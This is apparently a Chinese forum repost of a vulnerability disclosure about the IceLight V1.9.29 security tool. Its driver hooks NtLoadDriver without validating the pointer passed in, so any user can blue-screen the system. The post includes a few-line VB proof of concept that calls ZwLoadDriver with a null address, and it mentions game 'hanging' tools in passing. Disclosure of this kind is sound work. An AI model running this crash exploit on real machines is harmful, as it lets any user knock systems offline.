(注:转载于葡萄)
关于IL+XT挂起的方法:人妖发过了,自己找找。。我就不发了
IL下载,简单点直接迅雷搜搜找,或者论坛里有人也发了连接
以下问题看清楚了,说是木马病毒的我。。。。:
IceLight (以下简称 IL) 号称一款计算机安全辅助工具, 在 9 月 14 日及之后的版本中加入了主动防御功能。
令人遗憾的是, 其最新版本 V1.9.29 的驱动程序中存在多处内核拒绝服务漏洞, 在开启 IceLight 主动防御的情况下, 任意权限的用户即可导致系统蓝屏。
出问题的组件: ILDriverXSZ.sys CheckSum=00010C03 TimeStamp=48E0B5F0
IL 在对 SSDT Hook 时, 存在多处参数不经检查即使用, 用户态传入无效地址即可引发错误, 系统崩溃, 蓝屏重启.
示例函数: NtLoadDriver
函数 NtLoadDriver 的原型是:
NTSTATUS
NtLoadDriver(
IN PUNICODE_STRING DriverServiceName
)
IL 在其 Hook 函数中, 没有任何检查地使用了 DriverServiceName, 这样, 如果我们传入一个无效的地址, 就会引发崩溃, 蓝屏重启.
测试代码:
Declare Function ZwLoadDriver Lib "ntdll" (ByVal a As Long) As Long
Sub Main()
MsgBox "IceLight V1.9.29 内核漏洞演示 by iceboy"
ZwLoadDriver 0
End Sub
如何解决: XP多用户---切换到GUEST用户使用可解决
